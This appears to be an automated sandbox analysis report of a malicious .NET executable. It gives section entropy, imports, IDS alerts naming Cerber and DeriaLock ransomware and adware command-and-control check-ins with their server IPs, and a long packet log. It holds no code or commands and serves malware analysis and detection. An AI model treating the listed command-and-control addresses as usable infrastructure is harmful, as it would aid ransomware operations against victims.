                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x20000x247040x24800False0.9715927333047946data7.963294302792805IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x280000x5660x600False0.408203125data3.9657132211361437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x2a0000xc0x200False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                        RT_VERSION0x280a00x2dcdata
                                                                                                        RT_MANIFEST0x2837c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                        DLLImport
                                                                                                        mscoree.dll_CorExeMain
                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        192.168.2.4185.53.177.5349790802809804 09/29/22-14:46:34.229435TCP2809804ETPRO MALWARE FakeAdwareCleaner.A Checkin4979080192.168.2.4185.53.177.53
                                                                                                        192.168.2.493.107.12.05856668932023612 09/29/22-14:45:15.538371UDP2023612ET TROJAN Ransomware/Cerber Checkin M3 (1)585666893192.168.2.493.107.12.0
                                                                                                        192.168.2.454.242.4.10149779802849814 09/29/22-14:46:20.244595TCP2849814ETPRO MALWARE TakeMyFile User-Agent4977980192.168.2.454.242.4.101
                                                                                                        192.168.2.4162.55.0.13749795802824087 09/29/22-14:46:39.871600TCP2824087ETPRO TROJAN MSIL/DeriaLock Ransomware CnC Activity4979580192.168.2.4162.55.0.137
                                                                                                        192.168.2.454.242.4.10149779802849813 09/29/22-14:46:20.244595TCP2849813ETPRO MALWARE TakeMyFile Installer Checkin4977980192.168.2.454.242.4.101
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Sep 29, 2022 14:44:59.691735029 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:44:59.691785097 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:44:59.691890001 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:44:59.737828016 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:44:59.737874031 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:44:59.814109087 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:44:59.814344883 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:44:59.824933052 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:44:59.824949026 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:44:59.825624943 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:44:59.866480112 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:00.296900034 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:00.296940088 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.331273079 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.331393003 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.331475973 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:00.331485987 CEST44349707140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.331540108 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:00.336440086 CEST49707443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:00.365744114 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.365801096 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.365919113 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.388861895 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.388900042 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.433796883 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.434011936 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.438014984 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.438046932 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.438477039 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.440268040 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.440298080 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460086107 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460170984 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460206985 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460242033 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460273027 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460304976 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460323095 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.460339069 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460367918 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460400105 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.460400105 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.460436106 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.460700989 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460808992 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.460864067 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.460880041 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.461529970 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.461617947 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.461643934 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.464850903 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.464879036 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.464998960 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.465033054 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.476648092 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.476680994 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.476747990 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.476790905 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.476809978 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.479083061 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.479105949 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.479173899 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.479201078 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.479218006 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.481535912 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.481570005 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.481628895 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.481656075 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.481672049 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.482822895 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.482845068 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.482902050 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.482923985 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.482938051 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.492042065 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.492074966 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.492144108 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.492177010 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.492204905 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.493159056 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.493180037 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.493278027 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.493313074 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.493343115 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.494910955 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.494941950 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.495027065 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.495064020 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.495099068 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.495893002 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.495913982 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.496010065 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.496035099 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.496059895 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.497289896 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.497317076 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.497400999 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.497426033 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.497450113 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.498262882 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.498284101 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.498366117 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.498397112 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.498416901 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.499345064 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.499372005 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.499444008 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.499471903 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.499495029 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.500224113 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.500253916 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.500341892 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.500370979 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.500390053 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.507105112 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.507183075 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.507249117 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.507281065 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.507302046 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.507594109 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.507615089 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.507683992 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.507709026 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.507731915 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.508709908 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.508743048 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.508827925 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.508856058 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.508878946 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.509079933 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.509099960 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.509149075 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.509161949 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.509196997 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.509927988 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.509958982 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.510016918 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.510030031 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.510061979 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.510705948 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.510725975 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.510785103 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.510796070 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.510832071 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.511512041 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.511539936 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.511616945 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.511629105 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.511655092 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.511966944 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.511986971 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.512034893 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.512046099 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.512079954 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.512629986 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.512659073 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.512727976 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.512738943 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.512763023 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.513185978 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.513206005 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.513272047 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.513283014 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.513320923 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.513418913 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.513473034 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.513482094 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.513498068 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.513516903 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.513547897 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.513598919 CEST44349708185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:00.513653040 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:00.514714956 CEST49708443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:04.968287945 CEST49709443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:04.968353987 CEST44349709140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:04.968456030 CEST49709443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:04.968920946 CEST49709443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:04.968949080 CEST44349709140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.012187958 CEST44349709140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.016778946 CEST49709443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:05.016828060 CEST44349709140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.051830053 CEST44349709140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.052027941 CEST44349709140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.052153111 CEST44349709140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.052164078 CEST49709443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:05.052231073 CEST49709443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:05.052634954 CEST49709443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:05.053622961 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.053693056 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.053801060 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.055052996 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.055085897 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.104492903 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.106462955 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.106511116 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.134171009 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.136410952 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.136481047 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.136516094 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.136549950 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.136576891 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.136612892 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.139444113 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.139501095 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.139574051 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.139595985 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.139616013 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.151093960 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.151175022 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.151256084 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.151287079 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.151310921 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.153470039 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.153534889 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.153598070 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.153633118 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.153691053 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.154829025 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.154906988 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.154942036 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.154959917 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.154983997 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.156685114 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.156728029 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.156785011 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.156806946 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.156826973 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.165309906 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.165375948 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.165472031 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.165482044 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.165508986 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.165533066 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.165554047 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.165569067 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.165644884 CEST44349710185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.165702105 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.204020977 CEST49710443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:05.949408054 CEST49711443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:05.949455976 CEST44349711140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.949553013 CEST49711443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:05.950124025 CEST49711443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:05.950138092 CEST44349711140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:05.994755983 CEST44349711140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.010416031 CEST49711443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:06.010442972 CEST44349711140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.039225101 CEST44349711140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.039540052 CEST44349711140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.039670944 CEST44349711140.82.121.3192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.039783001 CEST49711443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:06.040225029 CEST49711443192.168.2.4140.82.121.3
                                                                                                        Sep 29, 2022 14:45:06.041299105 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.041332960 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.041439056 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.041755915 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.041774988 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.081383944 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.083249092 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.083276987 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.112373114 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.114598036 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.114633083 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.114706993 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.114751101 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.114769936 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.114804029 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.117757082 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.117837906 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.117865086 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.117885113 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.117897987 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.129596949 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.129673958 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.129698038 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.129724026 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.129755020 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.132159948 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.132210016 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.132225990 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.132241011 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.132308006 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.133564949 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.133615971 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.133657932 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.133668900 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.133687019 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.135493994 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.135551929 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.135575056 CEST49712443192.168.2.4185.199.110.133
                                                                                                        Sep 29, 2022 14:45:06.135586977 CEST44349712185.199.110.133192.168.2.4
                                                                                                        Sep 29, 2022 14:45:06.135624886 CEST49712443192.168.2.4185.199.110.133
